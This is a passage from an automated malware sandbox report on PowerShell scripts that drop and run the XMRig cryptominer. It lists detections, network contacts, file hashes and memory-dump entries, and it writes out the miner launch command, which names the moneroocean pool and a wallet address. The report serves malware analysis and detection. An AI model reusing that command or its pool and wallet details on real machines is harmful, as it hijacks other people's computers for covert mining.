memory/2352-105-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-106-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-107-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-108-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-109-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-110-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-111-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-112-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-113-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-114-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-115-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-116-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-117-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-118-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-119-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-120-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-121-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-122-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-123-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-124-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-125-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-126-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-127-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-128-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-129-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-130-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-131-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-132-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-133-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-134-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-135-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-136-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-137-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-138-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-139-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-140-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-141-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-142-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-143-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-144-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-145-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-146-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-147-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-148-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-149-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-150-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-151-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-152-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-153-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-154-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-155-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-156-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:12
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4880 wrote to memory of 3256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4880 wrote to memory of 3256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.229.48:443 | | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4880-4-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-5-0x000001E940F90000-0x000001E940FB2000-memory.dmp
memory/4880-6-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-9-0x000001E9595C0000-0x000001E959636000-memory.dmp
memory/4880-10-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2vyj2g2.zjo.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4880-25-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-48-0x000001E941040000-0x000001E941052000-memory.dmp
memory/4880-61-0x000001E941020000-0x000001E94102A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3256-90-0x000001839B300000-0x000001839B320000-memory.dmp
memory/3256-91-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-92-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/4880-93-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-94-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-95-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/3256-96-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-97-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-98-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-99-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-100-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-101-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-102-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-103-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-104-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-105-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-106-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-107-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-108-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-109-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-110-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-111-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-112-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-113-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-114-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-115-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-116-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-117-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-118-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-119-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-120-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-121-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-122-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-123-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-124-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-125-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-126-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-127-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-128-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-129-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-130-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-131-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-132-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-133-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-134-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-135-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-136-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-137-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-138-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-139-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-140-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-141-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-142-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-143-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-144-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-145-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-146-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-147-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-148-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-149-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-150-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-151-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-152-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-153-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-154-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-155-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-156-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:18
Platform
win11-20240508-en
Max time kernel
1646s
Max time network
1657s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| IE | 52.111.236.22:443 | | tcp |
Files
memory/2632-0-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp
memory/2632-6-0x000001B849210000-0x000001B849232000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cisfmsdk.qxc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2632-10-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-11-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-12-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-13-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-14-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5056 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5056 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
Files
memory/5056-2-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp
memory/5056-5-0x000001E8C8F40000-0x000001E8C8F62000-memory.dmp
memory/5056-7-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/5056-10-0x000001E8C90F0000-0x000001E8C9166000-memory.dmp
memory/5056-11-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5qsnrce.mre.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5056-28-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/5056-52-0x000001E8C90D0000-0x000001E8C90E2000-memory.dmp
memory/5056-65-0x000001E8C90B0000-0x000001E8C90BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1736-94-0x00000184BB6A0000-0x00000184BB6C0000-memory.dmp
memory/5056-95-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp
memory/5056-96-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/1736-97-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/5056-98-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/1736-99-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-100-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-101-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-102-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-103-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-104-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-105-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-106-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-107-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-108-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-109-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-110-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-111-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-112-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-113-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-114-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-115-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-116-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-117-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-118-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-119-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-120-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-121-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-122-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-123-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-124-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-125-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-126-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-127-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-128-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-129-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-130-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-131-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-132-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-133-0x00007FF614920000-0x00007FF615553000-memory.dmp
